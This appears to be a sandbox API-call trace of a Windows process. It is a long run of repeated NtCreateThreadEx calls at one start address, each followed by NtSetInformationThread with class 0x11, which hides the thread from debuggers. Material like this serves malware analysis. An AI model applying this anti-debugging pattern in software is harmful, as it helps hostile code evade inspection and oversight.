[0090.712] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4e8, lpBytesBuffer=0x0) returned 0x0 [0090.713] NtSetInformationThread (ThreadHandle=0x4e8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.713] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4ec, lpBytesBuffer=0x0) returned 0x0 [0090.713] NtSetInformationThread (ThreadHandle=0x4ec, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.714] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4f0, lpBytesBuffer=0x0) returned 0x0 [0090.714] NtSetInformationThread (ThreadHandle=0x4f0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.714] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4f4, lpBytesBuffer=0x0) returned 0x0 [0090.715] NtSetInformationThread (ThreadHandle=0x4f4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.715] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4f8, lpBytesBuffer=0x0) returned 0x0 [0090.715] NtSetInformationThread (ThreadHandle=0x4f8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.715] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x4fc, lpBytesBuffer=0x0) returned 0x0 [0090.716] NtSetInformationThread (ThreadHandle=0x4fc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.716] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x500, lpBytesBuffer=0x0) returned 0x0 [0090.716] NtSetInformationThread (ThreadHandle=0x500, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.717] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x504, lpBytesBuffer=0x0) returned 0x0 [0090.717] NtSetInformationThread (ThreadHandle=0x504, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.717] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x508, lpBytesBuffer=0x0) returned 0x0 [0090.718] NtSetInformationThread (ThreadHandle=0x508, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.718] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x50c, lpBytesBuffer=0x0) returned 0x0 [0090.718] NtSetInformationThread (ThreadHandle=0x50c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.718] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x510, lpBytesBuffer=0x0) returned 0x0 [0090.719] NtSetInformationThread (ThreadHandle=0x510, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.719] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x514, lpBytesBuffer=0x0) returned 0x0 [0090.720] NtSetInformationThread (ThreadHandle=0x514, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.720] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x518, lpBytesBuffer=0x0) returned 0x0 [0090.721] NtSetInformationThread (ThreadHandle=0x518, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.721] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x51c, lpBytesBuffer=0x0) returned 0x0 [0090.721] NtSetInformationThread (ThreadHandle=0x51c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.721] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x520, lpBytesBuffer=0x0) returned 0x0 [0090.722] NtSetInformationThread (ThreadHandle=0x520, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.722] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x524, lpBytesBuffer=0x0) returned 0x0 [0090.722] NtSetInformationThread (ThreadHandle=0x524, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.722] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x528, lpBytesBuffer=0x0) returned 0x0 [0090.723] NtSetInformationThread (ThreadHandle=0x528, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.723] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x52c, lpBytesBuffer=0x0) returned 0x0 [0090.724] NtSetInformationThread (ThreadHandle=0x52c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.724] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x530, lpBytesBuffer=0x0) returned 0x0 [0090.724] NtSetInformationThread (ThreadHandle=0x530, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.724] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x534, lpBytesBuffer=0x0) returned 0x0 [0090.725] NtSetInformationThread (ThreadHandle=0x534, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.725] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x538, lpBytesBuffer=0x0) returned 0x0 [0090.725] NtSetInformationThread (ThreadHandle=0x538, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.725] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x53c, lpBytesBuffer=0x0) returned 0x0 [0090.726] NtSetInformationThread (ThreadHandle=0x53c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.726] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x540, lpBytesBuffer=0x0) returned 0x0 [0090.726] NtSetInformationThread (ThreadHandle=0x540, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.727] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x544, lpBytesBuffer=0x0) returned 0x0 [0090.727] NtSetInformationThread (ThreadHandle=0x544, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.727] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x548, lpBytesBuffer=0x0) returned 0x0 [0090.728] NtSetInformationThread (ThreadHandle=0x548, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.728] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x54c, lpBytesBuffer=0x0) returned 0x0 [0090.728] NtSetInformationThread (ThreadHandle=0x54c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.728] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x550, lpBytesBuffer=0x0) returned 0x0 [0090.730] NtSetInformationThread (ThreadHandle=0x550, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.730] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x554, lpBytesBuffer=0x0) returned 0x0 [0090.731] NtSetInformationThread (ThreadHandle=0x554, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.731] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x558, lpBytesBuffer=0x0) returned 0x0 [0090.731] NtSetInformationThread (ThreadHandle=0x558, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.731] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x55c, lpBytesBuffer=0x0) returned 0x0 [0090.732] NtSetInformationThread (ThreadHandle=0x55c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.732] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x560, lpBytesBuffer=0x0) returned 0x0 [0090.732] NtSetInformationThread (ThreadHandle=0x560, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.733] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x564, lpBytesBuffer=0x0) returned 0x0 [0090.733] NtSetInformationThread (ThreadHandle=0x564, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.733] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x568, lpBytesBuffer=0x0) returned 0x0 [0090.734] NtSetInformationThread (ThreadHandle=0x568, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.734] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x56c, lpBytesBuffer=0x0) returned 0x0 [0090.734] NtSetInformationThread (ThreadHandle=0x56c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.734] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x570, lpBytesBuffer=0x0) returned 0x0 [0090.735] NtSetInformationThread (ThreadHandle=0x570, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.735] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x574, lpBytesBuffer=0x0) returned 0x0 [0090.736] NtSetInformationThread (ThreadHandle=0x574, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.736] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x578, lpBytesBuffer=0x0) returned 0x0 [0090.736] NtSetInformationThread (ThreadHandle=0x578, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.736] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x57c, lpBytesBuffer=0x0) returned 0x0 [0090.737] NtSetInformationThread (ThreadHandle=0x57c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.737] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x580, lpBytesBuffer=0x0) returned 0x0 [0090.737] NtSetInformationThread (ThreadHandle=0x580, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.737] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x584, lpBytesBuffer=0x0) returned 0x0 [0090.738] NtSetInformationThread (ThreadHandle=0x584, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.738] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x588, lpBytesBuffer=0x0) returned 0x0 [0090.738] NtSetInformationThread (ThreadHandle=0x588, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.738] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x58c, lpBytesBuffer=0x0) returned 0x0 [0090.739] NtSetInformationThread (ThreadHandle=0x58c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.739] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x590, lpBytesBuffer=0x0) returned 0x0 [0090.740] NtSetInformationThread (ThreadHandle=0x590, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.740] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x594, lpBytesBuffer=0x0) returned 0x0 [0090.740] NtSetInformationThread (ThreadHandle=0x594, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.740] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x598, lpBytesBuffer=0x0) returned 0x0 [0090.741] NtSetInformationThread (ThreadHandle=0x598, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.741] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x59c, lpBytesBuffer=0x0) returned 0x0 [0090.741] NtSetInformationThread (ThreadHandle=0x59c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.741] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5a0, lpBytesBuffer=0x0) returned 0x0 [0090.742] NtSetInformationThread (ThreadHandle=0x5a0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.742] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5a4, lpBytesBuffer=0x0) returned 0x0 [0090.742] NtSetInformationThread (ThreadHandle=0x5a4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.743] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5a8, lpBytesBuffer=0x0) returned 0x0 [0090.743] NtSetInformationThread (ThreadHandle=0x5a8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.743] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5ac, lpBytesBuffer=0x0) returned 0x0 [0090.744] NtSetInformationThread (ThreadHandle=0x5ac, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.744] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x5b0, lpBytesBuffer=0x0) returned 0x0 [0090.744] NtSetInformationThread (ThreadHandle=0x5b0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0090.745] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, 